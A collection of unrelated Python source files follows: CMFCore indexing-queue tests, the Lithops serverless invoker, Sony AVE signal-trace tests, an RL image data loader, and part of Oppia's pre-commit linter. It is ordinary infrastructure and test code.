self.assertEqual(me.getState(), [])
me.index('foo') # something happening on our side...
self.assertEqual(other, [(REINDEX, 'bar', None, 1)])
self.assertEqual(me.getState(), [(INDEX, 'foo', None, None)])
thread.join() # finally the threads are re-united...
def testQueuesOnTwoThreads(self):
me = self.me # get the queued indexer...
first = []
def runner1(): # and callables for the first...
me.index('foo')
first[:] = me.getState()
thread1 = Thread(target=runner1)
second = []
def runner2(): # and second thread
me.index('bar')
second[:] = me.getState()
thread2 = Thread(target=runner2)
self.assertEqual(first, []) # clean table before we start...
self.assertEqual(second, [])
self.assertEqual(me.getState(), [])
thread1.start() # do stuff here...
sleep(0.01) # allow thread to do work
self.assertEqual(first, [(INDEX, 'foo', None, None)])
self.assertEqual(second, [])
self.assertEqual(me.getState(), [])
thread2.start() # and there...
sleep(0.01) # allow thread to do work
self.assertEqual(first, [(INDEX, 'foo', None, None)])
self.assertEqual(second, [(INDEX, 'bar', None, None)])
self.assertEqual(me.getState(), [])
thread1.join() # re-unite with first thread and...
me.unindex('f00') # let something happening on our side
self.assertEqual(first, [(INDEX, 'foo', None, None)])
self.assertEqual(second, [(INDEX, 'bar', None, None)])
self.assertEqual(me.getState(), [(UNINDEX, 'f00', None, None)])
thread2.join() # also re-unite the second and...
me.unindex('f00') # let something happening again...
self.assertEqual(first, [(INDEX, 'foo', None, None)])
self.assertEqual(second, [(INDEX, 'bar', None, None)])
self.assertEqual(me.getState(),
[(UNINDEX, 'f00', None, None),
(UNINDEX, 'f00', None, None)])
def testManyThreads(self):
me = self.me # get the queued indexer...
queues = {} # container for local queues
def makeRunner(name, idx):
def runner():
for n in range(idx): # index idx times
me.index(name)
queues[currentThread()] = me.queue
return runner
threads = []
for idx in range(99):
threads.append(Thread(target=makeRunner('t%d' % idx, idx)))
for thread in threads:
thread.start()
sleep(0.01) # just in case
for thread in threads:
thread.join()
for idx, thread in enumerate(threads):
tid = 't%d' % idx
queue = queues[thread]
names = [name for op, name, attrs, metadata in queue]
self.assertEqual(names, [tid] * idx)
class QueueTransactionManagerTests(TestCase):
def setUp(self):
self.queue = MockQueueProcessor()
self.tman = QueueTM(self.queue)
self.queue.hook = self.tman.register # transaction manager hook
def testFlushQueueOnCommit(self):
self.queue.index('foo')
commit()
self.assertEqual(self.queue.getState(), [])
self.assertEqual(self.queue.processed, [(INDEX, 'foo', None)])
self.assertEqual(self.queue.state, 'finished')
def testFlushQueueOnAbort(self):
self.queue.index('foo')
abort()
self.assertEqual(self.queue.getState(), [])
self.assertEqual(self.queue.processed, None)
self.assertEqual(self.queue.state, 'aborted')
def testUseSavePoint(self):
self.queue.index('foo')
savepoint()
self.queue.reindex('bar')
commit()
self.assertEqual(self.queue.getState(), [])
self.assertEqual(self.queue.processed,
[(INDEX, 'foo', None),
(REINDEX, 'bar', None)])
self.assertEqual(self.queue.state, 'finished')
def testRollbackSavePoint(self):
self.queue.index('foo')
sp = savepoint()
self.queue.reindex('bar')
sp.rollback()
commit()
self.assertEqual(self.queue.getState(), [])
self.assertEqual(self.queue.processed, [(INDEX, 'foo', None)])
self.assertEqual(self.queue.state, 'finished')
class FakeFolder(Implicit):
id = 'portal'
def getPhysicalPath(self):
return ('portal',)
class UnindexWrapperTests(TestCase):
def setUp(self):
self.root = FakeFolder()
self.root.sub1 = DummyFolder('sub1')
self.root.sub1.testcontent = DummyContent('testcontent')
self.root.sub1.testcontent.title = 'Test Title'
def test_wrap_content(self):
from Products.CMFCore.indexing import wrap
unwrapped = self.root.sub1.testcontent
wrapped = wrap(unwrapped)
self.assertTrue(unwrapped.getPhysicalPath()[-1], 'testcontent')
self.assertEqual(unwrapped.getPhysicalPath(),
wrapped.getPhysicalPath())
self.assertEqual(hash(unwrapped), hash(wrapped))
self.assertEqual(unwrapped.Title(), wrapped.Title())
# change the id of our test content, which changes getPhysicalPath
# All other attributes/methods remain unchanged
unwrapped.id = 'test2'
self.assertTrue(unwrapped.getPhysicalPath()[-1], 'test2')
self.assertNotEqual(unwrapped.getPhysicalPath(),
wrapped.getPhysicalPath())
self.assertEqual(hash(unwrapped), hash(wrapped))
self.assertEqual(unwrapped.Title(), wrapped.Title())
|
invoker.py
|
#
# (C) Copyright IBM Corp. 2019
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import time
import logging
import multiprocessing as mp
from types import SimpleNamespace
from concurrent.futures import ThreadPoolExecutor
from lithops.serverless import ServerlessHandler
from lithops.invokers import JobMonitor
from lithops.storage import InternalStorage
from lithops.version import __version__
from lithops.utils import iterchunks
from lithops.config import extract_serverless_config, extract_storage_config
logger = logging.getLogger(__name__)
def function_invoker(job_payload):
if __version__ != job_payload['lithops_version']:
raise Exception("WRONGVERSION", "Lithops version mismatch",
__version__, job_payload['lithops_version'])
log_level = logging.getLevelName(logger.getEffectiveLevel())
custom_env = {'LITHOPS_WORKER': 'True',
'PYTHONUNBUFFERED': 'True'}
os.environ.update(custom_env)
config = job_payload['config']
num_invokers = job_payload['invokers']
invoker = ServerlessInvoker(config, num_invokers, log_level)
invoker.run(job_payload)
class ServerlessInvoker:
"""
Module responsible to perform the invocations against the serverless compute backend
"""
def __init__(self, config, num_invokers, log_level):
self.config = config
self.num_invokers = num_invokers
self.log_level = log_level
storage_config = extract_storage_config(self.config)
self.internal_storage = InternalStorage(storage_config)
self.remote_invoker = self.config['lithops'].get('remote_invoker', False)
self.rabbitmq_monitor = self.config['lithops'].get('rabbitmq_monitor', False)
if self.rabbitmq_monitor:
self.rabbit_amqp_url = self.config['rabbitmq'].get('amqp_url')
self.num_workers = self.config['lithops'].get('workers')
logger.info('Total workers: {}'.format(self.num_workers))
serverless_config = extract_serverless_config(self.config)
self.serverless_handler = ServerlessHandler(serverless_config, storage_config)
self.token_bucket_q = mp.Queue()
self.pending_calls_q = mp.Queue()
self.job_monitor = JobMonitor(self.config, self.internal_storage, self.token_bucket_q)
def _invoke(self, job, call_ids_range):
"""
Method used to perform the actual invocation against the Compute Backend
"""
data_byte_ranges = [job.data_byte_ranges[int(call_id)] for call_id in call_ids_range]
payload = {'config': self.config,
'chunksize': job.chunksize,
'log_level': self.log_level,
'func_key': job.func_key,
'data_key': job.data_key,
'extra_env': job.extra_env,
'execution_timeout': job.execution_timeout,
'data_byte_ranges': data_byte_ranges,
'executor_id': job.executor_id,
'job_id': job.job_id,
'job_key': job.job_key,
'call_ids': call_ids_range,
'host_submit_tstamp': time.time(),
'lithops_version': __version__,
'runtime_name': job.runtime_name,
'runtime_memory': job.runtime_memory,
'worker_processes': job.worker_processes}
# do the invocation
start = time.time()
activation_id = self.serverless_handler.invoke(job.runtime_name,
job.runtime_memory,
payload)
roundtrip = time.time() - start
resp_time = format(round(roundtrip, 3), '.3f')
if not activation_id:
self.pending_calls_q.put((job, call_id))
return
logger.info('ExecutorID {} | JobID {} - Function invocation '
'{} done! ({}s) - Activation ID: {}'.
format(job.executor_id, job.job_id, call_id,
resp_time, activation_id))
return call_id
def run(self, job_payload):
"""
Run a job described in job_description
"""
job = SimpleNamespace(**job_payload)
job.total_calls = len(job.call_ids)
logger.info('ExecutorID {} | JobID {} - Starting function '
'invocation - Total: {} activations'
.format(job.executor_id, job.job_id, job.total_calls))
logger.info('ExecutorID {} | JobID {} - Chunksize:'
' {} - Worker processes: {}'
.format(job.executor_id, job.job_id,
job.chunksize, job.worker_processes))
for i in range(self.num_workers):
self.token_bucket_q.put('#')
for call_ids_range in iterchunks(job.call_ids, job.chunksize):
self.pending_calls_q.put((job, call_ids_range))
self.job_monitor.start_job_monitoring(job)
invokers = []
for inv_id in range(self.num_invokers):
p = mp.Process(target=self._run_process, args=(inv_id, ))
p.daemon = True
p.start()
invokers.append(p)
for p in invokers:
p.join()
def _run_process(self, inv_id):
"""
Run process that implements token bucket scheduling approach
"""
logger.info('Invoker process {} started'.format(inv_id))
call_futures = []
with ThreadPoolExecutor(max_workers=250) as executor:
# TODO: Change pending_calls_q check
while self.pending_calls_q.qsize() > 0:
self.token_bucket_q.get()
job, call_ids_range = self.pending_calls_q.get()
future = executor.submit(self._invoke, job, call_ids_range)
call_futures.append(future)
logger.info('Invoker process {} finished'.format(inv_id))
|
hickup.py
|
#coding=utf8
# Copyright (C) 2013 Sony Mobile Communications AB.
# All rights, including trade secret rights, reserved.
import os
import time
import glob
import json
import signal
from ave.network.exceptions import *
from ave.network.control import RemoteControl
from ave.network.connection import *
from ave.network.process import Process
import setup
def wait_hickup_dir(path, timeout):
limit = time.time() + timeout
while True:
if time.time() > limit:
return False
if os.path.isdir(path):
return True
time.sleep(0.5)
# check that signalling a control process does not kill it
@setup.factory()
def t01(pretty, factory):
ctrl = factory.make_control(home=factory.HOME.path)
pid = ctrl.get_pid()
os.kill(pid, signal.SIGUSR1)
try:
pid = ctrl.get_pid()
except ConnectionClosed, e:
print('FAIL %s: SIGUSR1 killed the process: %s' % (pretty, e))
return False
except Exception, e:
print('FAIL %s: unknown error: %s' % (pretty, e))
return False
return True
# check that trace files are written to <home>/.ave/hickup with predictable
# file names
@setup.factory()
def t02(pretty, factory):
ctrl = factory.make_control(home=factory.HOME.path)
pid = ctrl.get_pid()
os.kill(pid, signal.SIGUSR1)
hickup_dir = os.path.join(factory.HOME.path, '.ave', 'hickup')
# signal handler runs asynchronously. allow for time to pass before failing
if not wait_hickup_dir(hickup_dir, 3):
print('FAIL %s: hickup dir not created' % pretty)
return False
# expect to find a file whose name includes todays date, the name of the
# signalled process and the process' pid. don't bother with high clock
# resolution in the date check. do note that the test *can* fail if run
# run very close to midnight
files = glob.glob(os.path.join(hickup_dir, '*'))
date = time.strftime('%Y%m%d')
if len(files) != 1:
print('FAIL %s: wrong number of files: %s' % (pretty, files))
return False
if date not in files[0]:
print('FAIL %s: date not in file name: %s' % (pretty, files[0]))
return False
if 'MockControl' not in files[0]:
print('FAIL %s: process name not in file name: %s' % (pretty, files[0]))
return False
if str(pid) not in files[0]:
print('FAIL %s: pid not in file name: %s' % (pretty, files[0]))
return False
return True
# check that the signal is propagated to children
@setup.factory()
def t03(pretty, factory):
ctrl = factory.make_control(home=factory.HOME.path)
pid = ctrl.get_pid()
ctrl.make_child()
os.kill(pid, signal.SIGUSR1)
path = os.path.join(factory.HOME.path, '.ave', 'hickup')
wait_hickup_dir(path, 3)
files = glob.glob(os.path.join(path, '*'))
if len(files) != 2:
print('FAIL %s: wrong number of files: %s' % (pretty, files))
return False
return True
# check that the signal is not propagated to non-ave processes such as external
# tools. these will otherwise terminate if they do not handle the signal.
@setup.factory()
def t04(pretty, factory):
ctrl = factory.make_control(home=factory.HOME.path)
pid = ctrl.get_pid()
cport, cpid = ctrl.make_child()
remote = RemoteControl(('',cport), None, None)
exe = os.path.join(os.path.dirname(__file__),'hickup_catch_sigusr1')
remote.run_external([exe, factory.HOME.path], __async__=True)
time.sleep(1)
os.kill(pid, signal.SIGUSR1)
path = os.path.join(factory.HOME.path, '.ave', 'hickup')
wait_hickup_dir(path, 3)
time.sleep(1)
files = glob.glob(os.path.join(path, '*'))
for f in files:
if f.endswith('hickup_catch_sigusr1'):
print('FAIL %s: external child got SIGUSR1' % pretty)
return False
if len(files) != 2:
print('FAIL %s: wrong number of files: %s' % (pretty, files))
return False
return True
# signal a process multiple times, count the trace files
@setup.factory()
def t05(pretty, factory):
ctrl = factory.make_control(home=factory.HOME.path)
for i in range(3):
try:
ctrl.kill(signal.SIGUSR1)
except ConnectionClosed:
print('FAIL %s: process died %d' % (pretty, i))
return False
except Exception, e:
print('FAIL %s: unknown error %d: %s' % (pretty, i, e))
return False
time.sleep(1.1)
path = os.path.join(factory.HOME.path, '.ave', 'hickup')
wait_hickup_dir(path, 3)
files = glob.glob(os.path.join(path, '*'))
if len(files) != 3:
print('FAIL %s: wrong number of files: %d' % (pretty, len(files)))
return False
return True
# check that signalling does not interfere with message passing
@setup.factory()
def t06(pretty, factory):
def killer(pid):
for i in range(150):
os.kill(pid, signal.SIGUSR1)
time.sleep(0.05)
ctrl = factory.make_control(home=factory.HOME.path, authkey='')
proc = Process(target=killer, args=(ctrl.get_pid(),))
proc.start()
# connect and authenticate
conn = BlockingConnection(('',ctrl.port))
conn.connect()
conn.put(make_digest(conn.get(), ''))
finish_challenge(conn.get())
# feed messages slowly to the controller, check that it doesn't crash
ok = True
for i in range(15):
blob = RemoteControl.make_rpc_blob('upper', None, 'a'*5000)
conn.write(Connection.make_header(blob))
#print '<',i
for char in blob:
conn.write(char)
time.sleep(0.00002)
#print '>',i
try:
msg = conn.get(timeout=1)
except Exception, e:
print('FAIL %s: control crashed in step %d: %s' % (pretty, i, e))
ok = False
break
try:
msg = json.loads(msg)
except Exception, e:
print('FAIL %s: could not decode response %d: %s' & (pretty, i, e))
ok = False
break
if msg != { 'result': 'A'*5000 }:
print('FAIL %s: wrong response in step %d: %s' % (pretty, i, msg))
ok = False
break
proc.join()
return ok
|
data_loader.py
|
# Original code from https://github.com/araffin/robotics-rl-srl
# Authors: Antonin Raffin, René Traoré, Ashley Hill
import queue
import time
from multiprocessing import Queue, Process
import cv2
import numpy as np
from joblib import Parallel, delayed
from modules.config import IMAGE_WIDTH, IMAGE_HEIGHT, ROI
def preprocess_input(x, mode="rl"):
"""
Normalize input.
:param x: (np.ndarray) (RGB image with values between [0, 255])
:param mode: (str) One of "image_net", "tf" or "rl".
- rl: divide by 255 only (rescale to [0, 1])
- image_net: will zero-center each color channel with
respect to the ImageNet dataset,
with scaling.
cf http://pytorch.org/docs/master/torchvision/models.html
- tf: will scale pixels between -1 and 1,
sample-wise.
:return: (np.ndarray)
"""
assert x.shape[-1] == 3, "Color channel must be at the end of the tensor {}".format(x.shape)
# RL mode: divide only by 255
x /= 255.
if mode == "tf":
x -= 0.5
x *= 2.
elif mode == "image_net":
# Zero-center by mean pixel
x[..., 0] -= 0.485
x[..., 1] -= 0.456
x[..., 2] -= 0.406
# Scaling
x[..., 0] /= 0.229
x[..., 1] /= 0.224
x[..., 2] /= 0.225
elif mode == "rl":
pass
else:
raise ValueError("Unknown mode for preprocessing")
return x
def denormalize(x, mode="rl"):
"""
De normalize data (transform input to [0, 1])
:param x: (np.ndarray)
:param mode: (str) One of "image_net", "tf", "rl".
:return: (np.ndarray)
"""
if mode == "tf":
x /= 2.
x += 0.5
elif mode == "image_net":
# Scaling
x[..., 0] *= 0.229
x[..., 1] *= 0.224
x[..., 2] *= 0.225
# Undo Zero-center
x[..., 0] += 0.485
x[..., 1] += 0.456
x[..., 2] += 0.406
elif mode == "rl":
pass
else:
raise ValueError("Unknown mode for denormalize")
# Clip to fix numeric imprecision (1e-09 = 0)
return (255 * np.clip(x, 0, 1)).astype(np.uint8)
def preprocess_image(image, convert_to_rgb=False):
"""
Crop, resize and normalize image.
Optionnally it also converts the image from BGR to RGB.
:param image: (np.ndarray) image (BGR or RGB)
:param convert_to_rgb: (bool) whether the conversion to rgb is needed or not
:return: (np.ndarray)
"""
# Crop
# Region of interest
r = ROI
image = image[int(r[1]):int(r[1] + r[3]), int(r[0]):int(r[0] + r[2])]
# Resize
im = cv2.resize(image, (IMAGE_WIDTH, IMAGE_HEIGHT), interpolation=cv2.INTER_AREA)
# Convert BGR to RGB
if convert_to_rgb:
im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
# Normalize
im = preprocess_input(im.astype(np.float32), mode="rl")
return im
class DataLoader(object):
def __init__(self, minibatchlist, images_path, n_workers=1, folder='logs/recorded_data/',
infinite_loop=True, max_queue_len=4, is_training=False):
"""
A Custom dataloader to preprocessing images and feed them to the network.
:param minibatchlist: ([np.array]) list of observations indices (grouped per minibatch)
:param images_path: (np.array) Array of path to images
:param n_workers: (int) number of preprocessing worker (load and preprocess each image)
:param folder: (str)
:param infinite_loop: (bool) whether to have an iterator that can be resetted, set to False, it
:param max_queue_len: (int) Max number of minibatches that can be preprocessed at the same time
:param is_training: (bool)
"""
super(DataLoader, self).__init__()
self.n_workers = n_workers
self.infinite_loop = infinite_loop
self.n_minibatches = len(minibatchlist)
self.minibatchlist = minibatchlist
self.images_path = images_path
self.shuffle = is_training
self.folder = folder
self.queue = Queue(max_queue_len)
self.process = None
self.start_process()
@staticmethod
def create_minibatch_list(n_samples, batch_size):
"""
Create list of minibatches.
:param n_samples: (int)
:param batch_size: (int)
:return: ([np.array])
"""
minibatchlist = []
for i in range(n_samples // batch_size + 1):
start_idx = i * batch_size
end_idx = min(n_samples, (i + 1) * batch_size)
minibatchlist.append(np.arange(start_idx, end_idx))
return minibatchlist
def start_process(self):
"""Start preprocessing process"""
self.process = Process(target=self._run)
# Make it a deamon, so it will be deleted at the same time
# of the main process
self.process.daemon = True
self.process.start()
def _run(self):
start = True
with Parallel(n_jobs=self.n_workers, batch_size="auto", backend="threading") as parallel:
while start or self.infinite_loop:
start = False
if self.shuffle:
indices = np.random.permutation(self.n_minibatches).astype(np.int64)
else:
indices = np.arange(len(self.minibatchlist), dtype=np.int64)
for minibatch_idx in indices:
images = self.images_path[self.minibatchlist[minibatch_idx]]
if self.n_workers <= 1:
batch = [self._make_batch_element(self.folder, image_path)
for image_path in images]
else:
batch = parallel(delayed(self._make_batch_element)(self.folder, image_path)
for image_path in images)
batch = np.concatenate(batch, axis=0)
if self.shuffle:
self.queue.put((minibatch_idx, batch))
else:
self.queue.put(batch)
# Free memory
del batch
self.queue.put(None)
@classmethod
def _make_batch_element(cls, folder, image_path):
"""
:param image_path: (str) path to an image (without the 'data/' prefix)
:return: (np.ndarray)
"""
image_path = folder + image_path
im = cv2.imread(image_path)
if im is None:
raise ValueError("tried to load {}.jpg, but it was not found".format(image_path))
im = preprocess_image(im)
im = im.reshape((1,) + im.shape)
return im
def __len__(self):
return self.n_minibatches
def __iter__(self):
return self
def __next__(self):
while True:
try:
val = self.queue.get_nowait()
break
except queue.Empty:
time.sleep(0.001)
continue
if val is None:
raise StopIteration
return val
def __del__(self):
if self.process is not None:
self.process.terminate()
|
pre_commit_linter.py
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pre-commit script for Oppia.
This script lints Python and JavaScript code, and prints a
list of lint errors to the terminal. If the directory path is passed,
it will lint all Python and JavaScript files in that directory; otherwise,
it will only lint files that have been touched in this commit.
This script ignores all filepaths contained within .eslintignore.
=====================
CUSTOMIZATION OPTIONS
=====================
1. To lint only files that have been touched in this commit
python -m scripts.linters.pre_commit_linter
2. To lint all files in the folder or to lint just a specific file
python -m scripts.linters.pre_commit_linter --path filepath
3. To lint a specific list of files. Separate filepaths by spaces
python -m scripts.linters.pre_commit_linter
--files filepath_1 filepath_2 ... filepath_n
4. To lint files in verbose mode
python -m scripts.linters.pre_commit_linter --verbose
5. To lint a specific list of file extensions. Separate file
extensions by spaces
python -m scripts.linters.pre_commit_linter
--only-check-file-extensions py js
Note that the root folder MUST be named 'oppia'.
"""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import argparse
import fnmatch
import multiprocessing
import os
import subprocess
import sys
import threading
import python_utils
# Install third party dependencies before proceeding.
from . import codeowner_linter
from . import css_linter
from . import general_purpose_linter
from . import html_linter
from . import js_ts_linter
from . import other_files_linter
from . import python_linter
from .. import common
from .. import concurrent_task_utils
from .. import install_third_party_libs
_PARSER = argparse.ArgumentParser()
_EXCLUSIVE_GROUP = _PARSER.add_mutually_exclusive_group()
_PARSER.add_argument(
'--path',
help='path to the directory with files to be linted',
action='store')
_EXCLUSIVE_GROUP.add_argument(
'--files',
nargs='+',
help='specific files to be linted. Space separated list',
action='store')
_EXCLUSIVE_GROUP.add_argument(
'--verbose',
help='verbose mode. All details will be printed.',
action='store_true')
_PARSER.add_argument(
'--only-check-file-extensions',
nargs='+',
choices=['html', 'css', 'js', 'ts', 'py', 'other'],
help='specific file extensions to be linted. Space separated list. '
'If either of js or ts used then both js and ts files will be linted.',
action='store')
_PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
_PATHS_TO_INSERT = [
os.getcwd(),
os.path.join(
common.GOOGLE_APP_ENGINE_SDK_HOME, 'lib', 'yaml-3.10'),
os.path.join(
common.GOOGLE_APP_ENGINE_SDK_HOME, 'lib', 'jinja2-2.6'),
os.path.join(
common.GOOGLE_APP_ENGINE_SDK_HOME),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'webtest-%s' % common.WEBTEST_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'PyGithub-%s' % common.PYGITHUB_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'Pillow-%s' % common.PILLOW_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'psutil-%s' % common.PSUTIL_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'pip-tools-%s' % common.PIP_TOOLS_VERSION),
common.THIRD_PARTY_PYTHON_LIBS_DIR
]
for path in _PATHS_TO_INSERT:
sys.path.insert(0, path)
_TARGET_STDOUT = python_utils.string_io()
_STDOUT_LIST = multiprocessing.Manager().list()
_FILES = multiprocessing.Manager().dict()
class FileCache(python_utils.OBJECT):
"""Provides thread-safe access to cached file content."""
def __init__(self):
self._CACHE_DATA_DICT = {}
def read(self, filepath, mode='r'):
"""Returns the data read from the file in unicode form.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
str. The data read from the file.
"""
return self._get_data(filepath, mode)[0]
def readlines(self, filepath, mode='r'):
"""Returns the tuple containing data line by line as read from the
file in unicode form.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
tuple(str). The tuple containing data line by line as read from the
file.
"""
return self._get_data(filepath, mode)[1]
def _get_data(self, filepath, mode):
"""Returns the collected data from the file corresponding to the given
filepath.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
tuple(str, tuple(str)). The tuple containing data read from the file
as first element and tuple containing the text line by line as
second element.
"""
key = (filepath, mode)
if key not in self._CACHE_DATA_DICT:
with python_utils.open_file(filepath, mode, newline='') as f:
lines = f.readlines()
self._CACHE_DATA_DICT[key] = (''.join(lines), tuple(lines))
return self._CACHE_DATA_DICT[key]
def _get_linters_for_file_extension(file_extension_to_lint):
"""Return linters for the file extension type.
Args:
file_extension_to_lint: str. The file extension to be linted.
Returns:
(CustomLintChecks, ThirdPartyLintChecks). A 2-tuple containing objects
of lint check classes to run in parallel processing.
"""
parent_dir = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
custom_linters = []
third_party_linters = []
file_extension_type_js_ts = file_extension_to_lint == 'js' or (
file_extension_to_lint == 'ts')
if file_extension_type_js_ts:
general_files_to_lint = _FILES['.js'] + _FILES['.ts']
elif file_extension_to_lint == 'other':
general_files_to_lint = _FILES['other']
else:
general_files_to_lint = _FILES['.%s' % file_extension_to_lint]
custom_linter, third_party_linter = general_purpose_linter.get_linters(
general_files_to_lint, FILE_CACHE)
custom_linters.append(custom_linter)
if file_extension_type_js_ts:
custom_linter, third_party_linter = js_ts_linter.get_linters(
_FILES['.js'], _FILES['.ts'], FILE_CACHE)
custom_linters.append(custom_linter)
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'html':
custom_linter, third_party_linter = html_linter.get_linters(
_FILES['.html'], FILE_CACHE)
custom_linters.append(custom_linter)
third_party_linters.append(third_party_linter)
config_path_for_css_in_html = os.path.join(
parent_dir, 'oppia', '.stylelintrc')
custom_linter, third_party_linter = css_linter.get_linters(
config_path_for_css_in_html, _FILES['.html'])
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'css':
config_path_for_oppia_css = os.path.join(
parent_dir, 'oppia', 'core', 'templates', 'css', '.stylelintrc')
custom_linter, third_party_linter = css_linter.get_linters(
config_path_for_oppia_css, _FILES['.css'])
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'py':
custom_linter, third_party_linter = python_linter.get_linters(
_FILES['.py'], FILE_CACHE)
custom_linters.append(custom_linter)
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'other':
custom_linter, _ = codeowner_linter.get_linters(FILE_CACHE)
custom_linters.append(custom_linter)
custom_linter, _ = other_files_linter.get_linters(FILE_CACHE)
custom_linters.append(custom_linter)
return custom_linters, third_party_linters
def _get_changed_filepaths():
"""Returns a list of modified files (both staged and unstaged)
Returns:
list. A list of filepaths of modified files.
"""
unstaged_files = subprocess.check_output([
'git', 'diff', '--name-only',
'--diff-filter=ACM']).splitlines()
staged_files = subprocess.check_output([
'git', 'diff', '--cached', '--name-only',
'--diff-filter=ACM']).splitlines()
all_changed_filepaths = unstaged_files + staged_files
return [filepath for filepath in all_changed_filepaths]
def _get_all_files_in_directory(dir_path, excluded_glob_patterns):
"""Recursively collects all files in directory and
subdirectories of specified path.
Args:
dir_path: str. Path to the folder to be linted.
excluded_glob_patterns: set(str). Set of all glob patterns
to be excluded.
Returns:
list. A list of files in directory and subdirectories without excluded
files.
"""
files_in_directory = []
for _dir, _, files in os.walk(dir_path):
for file_name in files:
filepath = os.path.relpath(
os.path.join(_dir, file_name), os.getcwd())
if not any([
fnmatch.fnmatch(filepath, gp) for gp in
excluded_glob_patterns]):
files_in_directory.append(filepath)
return files_in_directory
def _get_file_extensions(file_extensions_to_lint):
"""This function is used to return the file extensions which need to be
linted and checked.
Args:
file_extensions_to_lint: list(str). The list of file extensions to be
linted and checked.
Returns:
list(str). The list of all file extensions
to be linted and checked.
"""
all_file_extensions_type = ['js', 'py', 'html', 'css', 'other']
if file_extensions_to_lint:
# Check if 'js' and 'ts' both are present in file_extensions_to_lint.
js_and_ts_is_present = 'js' in file_extensions_to_lint and (
'ts' in file_extensions_to_lint)
if js_and_ts_is_present:
python_utils.PRINT(
'Please use only one of "js" or "ts", as we do not have '
'separate linters for JS and TS files. If both these options '
'are used together, then the JS/TS linter will be run twice.')
python_utils.PRINT('Exiting...')
sys.exit(1)
return set(file_extensions_to_lint)
return all_file_extensions_type
def _get_all_filepaths(input_path, input_filenames):
"""This function is used to return the filepaths which needs to be linted
and checked.
Args:
input_path: str. The path of the directory to be linted and checked.
input_filenames: list(str). The list of filenames to be linted and
checked, ignored if input_path is specified.
Returns:
list(str). The list of filepaths to be linted and checked.
"""
eslintignore_path = os.path.join(os.getcwd(), '.eslintignore')
if input_path:
input_path = os.path.join(os.getcwd(), input_path)
if not os.path.exists(input_path):
python_utils.PRINT(
'Could not locate file or directory %s. Exiting.' % input_path)
python_utils.PRINT('----------------------------------------')
sys.exit(1)
if os.path.isfile(input_path):
all_filepaths = [input_path]
else:
excluded_glob_patterns = FILE_CACHE.readlines(eslintignore_path)
all_filepaths = _get_all_files_in_directory(
input_path, excluded_glob_patterns)
elif input_filenames:
valid_filepaths = []
invalid_filepaths = []
for filename in input_filenames:
if os.path.isfile(filename):
valid_filepaths.append(filename)
else:
invalid_filepaths.append(filename)
if invalid_filepaths:
python_utils.PRINT(
'The following file(s) do not exist: %s\n'
'Exiting.' % invalid_filepaths)
sys.exit(1)
all_filepaths = valid_filepaths
else:
all_filepaths = _get_changed_filepaths()
all_filepaths = [
filename for filename in all_filepaths if not
any(fnmatch.fnmatch(filename, pattern) for pattern in(
general_purpose_linter.EXCLUDED_PATHS))]
return all_filepaths
def read_files(file_paths):
"""Read all files to be checked and cache them. This will spin off multiple
threads to increase the efficiency.
"""
threads = []
for file_path in file_paths:
thread = threading.Thread(target=FILE_CACHE.read, args=(file_path,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def categorize_files(file_paths):
"""Categorize all the files and store them in shared variable _FILES."""
all_filepaths_dict = {
'.py': [], '.html': [], '.ts': [], '.js': [], 'other': [], '.css': []
}
for file_path in file_paths:
_, extension = os.path.splitext(file_path)
if extension in all_filepaths_dict:
all_filepaths_dict[extension].append(file_path)
else:
all_filepaths_dict['other'].append(file_path)
_FILES.update(all_filepaths_dict)
def _print_summary_of_error_messages(lint_messages):
"""Print summary of linter error messages.
Args:
lint_messages: list(str). List of linter error messages.
"""
if lint_messages != '':
python_utils.PRINT('Please fix the errors below:')
python_utils.PRINT('----------------------------------------')
for message in lint_messages:
python_utils.PRINT(message)
def _get_task_output(lint_messages, failed, task):
"""Returns output of running tasks.
Args:
lint_messages: list(str). List of summary messages of linter output.
failed: bool. The boolean to check if lint checks fail or not.
task: object(TestingTaskSpec). The task object to get output of linter.
Returns:
bool. The boolean to check if the lint checks fail or not.
"""
if task.task_results:
for task_result in task.task_results:
lint_messages += task_result.trimmed_messages
if task_result.failed:
failed = True
return failed
def _print_errors_stacktrace(errors_stacktrace):
"""Print errors stacktrace caught during linter execution.
Args:
errors_stacktrace: list(str). List of error stacktrace of lint
execution failure.
"""
python_utils.PRINT('')
python_utils.PRINT(
'Unable to run the complete lint test, please check '
'the following stack trace and fix the errors:')
python_utils.PRINT('+--------------------------+')
for stacktrace in errors_stacktrace:
python_utils.PRINT(stacktrace)
python_utils.PRINT('--------------------------------------------------')
python_utils.PRINT('')
python_utils.PRINT('--------------------------------------------------')
python_utils.PRINT(
'Some of the linting functions may not run until the'
' above errors gets fixed')
